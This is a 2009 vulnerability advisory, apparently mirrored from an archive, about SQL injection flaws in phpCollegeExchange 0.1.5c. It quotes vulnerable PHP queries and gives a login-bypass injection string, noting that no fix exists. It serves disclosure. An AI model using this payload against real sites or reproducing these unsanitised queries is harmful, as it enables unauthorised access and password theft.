AOH :: HP Unsorted P :: BU-1239.HTM

phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities



phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities
phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities



phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities

 Name              phpCollegeExchange
Vendor http://phpcollegeex.sourceforge.net 
 Versions Affected 0.1.5c

 Author            Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net 
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2009-12-11

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 VI.   DISCLOSURE TIMELINE


I. ABOUT THE APPLICATION

PhpCollegeExchange  is  a  full  fledged college community
website.


II. DESCRIPTION

This  application  is  affected   by  many  SQL  Injection
security flaws. In order to exploit they, the Magic Quotes
GPG (php.ini) must  be  Off.
In  this  security  advisory  I  reported only some of the
vulnerable files.
I tested 0.1.5c version only, however  other versions  may
be also vulnerable.


III. ANALYSIS

Summary:

 A) Authentication Bypass
 B) Multiple SQL Injection

A) Authentication Bypass

Using a SQL Injection in the login process,  a  guest  can
bypass the authentication.
In order to exploit it,  The Magic Quotes GPG flag must be
Off.

Vulnerable code (functions.php):

........

 function checkpass($handle,$pass){
  require_once($home."mysqlinfo.php");
  include("i_aeskey.php");
  $query="SELECT AES_DECRYPT(password,'$AES_key') FROM users WHERE
(handle='$handle')";
  $result = mysql_query($query);

  if(mysql_num_rows($result))
  {
	if($r = mysql_fetch_array($result))
	 {$dbpass=$r[0];}
	 if($pass==$dbpass)
		{return 1;}

........


B) Multiple SQL Injection

Searchend.php is affected by multiple SQL injection issues
that  allow  a guest  to view reserved  information stored
into  the database.
The following  is an example  of vulnerable  code found in
searchend.php.

Vulnerable code (searchend.php):

........

$query = "SELECT * FROM Books";

if(isset($_POST['searchby'])){$searchby=$_POST['searchby'];}else{$searchby=$_GET['searchby'];}

switch($searchby){
	
........

case "Title"  :

$title = $_POST['searchquery'];
if(strlen($title)>2){
//check length at least 3 chars

$query .= " WHERE (title LIKE '%$title%') ORDER BY price";
$result = mysql_query($query);

........

Another funny SQL injection may be seen in forgotpass.php.
It can be manipulate to send to an arbitrary email address
the  password of a registered user, knowing  the  AES key.

Vulnerable code:

........

if( isset($_POST["handle"]) ){

........

$query="SELECT AES_DECRYPT(password,'$AES_key'), email FROM users
WHERE (handle='$handle')";
$result = mysql_query($query);

if(mysql_num_rows($result)){

  $r = mysql_fetch_array($result);

  $email = $r[1];
  $pass = $r[0];

  ........

  mail("$email", "Your Book Exchange Password", $emailcontent);

........


IV. SAMPLE CODE

A) Authentication Bypass

Username: -1') UNION ALL SELECT 'foo'#
Password: foo

B) Multiple SQL Injection

A proof of concept can be found here:
http://poc.salvatorefresta.net/PoC-phpCollegeExchange.txt 


V. FIX

No fix.


VIII. DISCLOSURE TIMELINE

2009-12-11 Bug discovered
2009-12-11 Initial vendor contact
2009-12-11 Advisory Release

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.